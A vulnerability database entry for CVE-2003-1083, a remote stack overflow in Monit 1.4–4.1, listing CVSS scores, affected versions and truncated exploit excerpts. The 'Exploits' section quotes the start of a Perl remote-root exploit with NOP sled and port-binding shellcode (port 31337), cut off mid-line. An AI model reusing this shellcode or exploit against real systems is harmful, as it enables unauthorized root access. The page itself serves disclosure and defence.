10
CVSSv2

CVE-2003-1083

Published: 31/12/2003 Updated: 11/07/2017
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
VMScore: 1000
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

Stack-based buffer overflow in Monit 1.4 to 4.1 allows remote malicious users to execute arbitrary code via a long HTTP request.

Vulnerable Product Search on Vulmon Subscribe to Product

tildeslash monit 2.0

tildeslash monit 2.1

tildeslash monit 2.4.3

tildeslash monit 3.0

tildeslash monit 1.4

tildeslash monit 1.4.1

tildeslash monit 2.4.1

tildeslash monit 2.4.2

tildeslash monit 2.1.1

tildeslash monit 2.2

tildeslash monit 3.1

tildeslash monit 3.2

tildeslash monit 2.2.1

tildeslash monit 2.3

tildeslash monit 2.4

tildeslash monit 4.0

tildeslash monit 4.1

Exploits

#!/usr/bin/perl # # monit <= 41 remote root exploit # coded by gsicht (090404) # use IO::Socket::INET; $socket = 0; my $shellcode = # 8 + 88 = 96 bytes portbind 31337 "\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90" "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" "\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd\x8 ...
source: wwwsecurityfocuscom/bid/9099/info A buffer overrun vulnerability has been discovered in Monit 41 and earlier that could be exploited remotely to gain root privileges The problem occurs due to insufficient bounds checking when handling overly long HTTP requests As a result, it may be possible for a remote attacker to corrupt sen ...